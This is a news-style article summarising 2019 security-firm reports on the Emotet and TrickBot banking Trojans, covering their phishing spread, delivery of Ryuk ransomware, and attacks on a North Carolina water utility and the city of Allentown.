The Emotet and Trickbot banking Trojans are among the latest threats in 2019. A new report released by security firm CrowdStrike showed that the Emotet and Trickbot malware strains were most prevalent in the first half of 2019. The report also identified other top threats this year, among them being Dridex, Gozi, and cryptocurrency mining malware. The Emotet Trojan, however, has continuously advanced since its release in 2014. It was originally created as a banking Trojan but has evolved over the years to a malicious code used to deliver large-scale botnet untargeted attacks.
As of July 2018, the US Department of Homeland Security had already issued an alert, describing the malware to be among “the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors”. Besides, researchers in various security firms have noted the various upgrades implemented on the Trojan. It is capable of stealing user credentials, evading security defenses, and responding to command and control servers of a system it has infected. A study published by Sophos security firm categorized Emotet to be worse than WannaCry, attributing this to the many updates that make it difficult to contain it.
Brad Duncan, who works at Palo Alto Networks as a threat intelligence analyst, observed in January 2019 that Emotet Trojan is among the most prevalent malware campaigns. According to Duncan, numerous attack vectors for an Emotet Trojan infection are identified every day. It has been severally used to distribute other malware families, where Duncan said to have “seen Emotet retrieve Gootkit and the IcedID banking Trojan”. Mealybug, the group that created the Emotet Trojan, has actively been using it to distribute additional malicious programs like Ryuk ransomware. For instance, the Emotet Trojan was blamed for the cyber-attack that targeted Onslow Water and Sewerage Authority (ONWASA) in Jacksonville, North Carolina.
Although IT security personnel at OWANSA had initially believed that they had successfully dealt with the Trojan, it proved to be persistent. It had been timed to drop a Ryuk ransomware at exactly 3 a.m. on 13th October. The security staff on duty witnessed the attack but were unable to contain it as it quickly spread through the network, encrypting databases and files. In a Separate incident, Duncan discovered that the Emotet malware had been used as a payload when macros are enabled in Microsoft Word. If the Macros were allowed to execute, they would download IcedID banking Trojan in a system.
Today’s version of Emotet is more advanced. Typically, it spreads itself across networks by using spam. It uses phishing techniques as it sends emails that contain infected documents. In contrast to typical phishing methods, where an attacker sends a batch of emails to unknown people, Emotet identifies email messages yet to be replied and responds to them. The recipient will proceed to open the malicious document only to be infected. The strategy has a high success rate. However, if Emotet infects a system, a 2019 Malwarebytes report indicates that it exploits EternalBlue vulnerabilities in systems running SMB_v1 version. The report stated that “Infected machines attempt to spread Emotet laterally via brute force of domain credentials, as well as externally via its built-in spam module”, and as a result, the Emotet Trojan is “quite active and responsible for much of the malspam we encounter”.
The Emotet Trojan was also reported to have been used to harvest millions of email messages. A report by Kryptos Logic indicated that the Emotet malware was used to exfiltrate emails, thus escalating its ability to be used for cyber espionage. Kryptos Logic also reported that the Emotet infection enabled the hackers to obtain email messages dating over three months. It has such abilities since it contains multiple small modules which it downloads once it has infected a system. The modules, including a spreader based on SMB, enables it to move laterally in a network, wreaking havoc in its wake. This is well demonstrated in an Emotet attack that targeted Allentown, Pennsylvania. The Emotet malware spread in all of the city’s networks, and downloaded additional malware on the infected networks. The city’s municipality resorted to rebuilding its entire infrastructure at a cost of $1 million.
The Emotet virus has also been touted as capable of shutting down a hospital. This is according to California-based online cybersecurity firm, Proofpoint. The malware, which was originally created to worm through a bank’s files, has “become the biggest malware payload sent to healthcare companies”, Proofpoint noted on October 27 2019. The Trojan first appeared in the first quarter as a botnet targeting health institutions in the US. In recent months, however, Proofpoint observed that the Emotet volume had gone down. The hiatus is as a result of the attackers retooling the Trojan to equip it with multiple abilities. As such, the Emotet malware is a prime example of multipurpose malware families that target the healthcare industry, Proofpoint concluded.
In addition, security researchers at Cybereason have dubbed a malware campaign that combines Emotet and TrickBot Trojans as a payload to deliver Ryuk ransomware as a triple threat. The researchers pointed out that the campaigns were targeting firms based in the US. The malware campaign starts with a phishing email. It delivers a Malicious Microsoft Word document to a user. Once an individual opens the document, it executes and runs a PowerShell command. The command connects to various malicious domains and attempts to download an Emotet payload.
Cybereason researchers further explained that the payload executes, infects a machine, and starts gathering sensitive information. The second attack phase initiates TrickBot Trojan download and execution. This is by communication with a remote host. The TrickBot Trojan infects a system and steals classified data like administrator credentials. The Emotet and TrickBot modules evade detection by being injected in legitimate programs. The attackers can laterally move in a network and connect to other systems in final phases of an attack. Emotet Banking Trojan has positioned itself as one of the most damaging malware families, and businesses should be aware of how they can prevent it.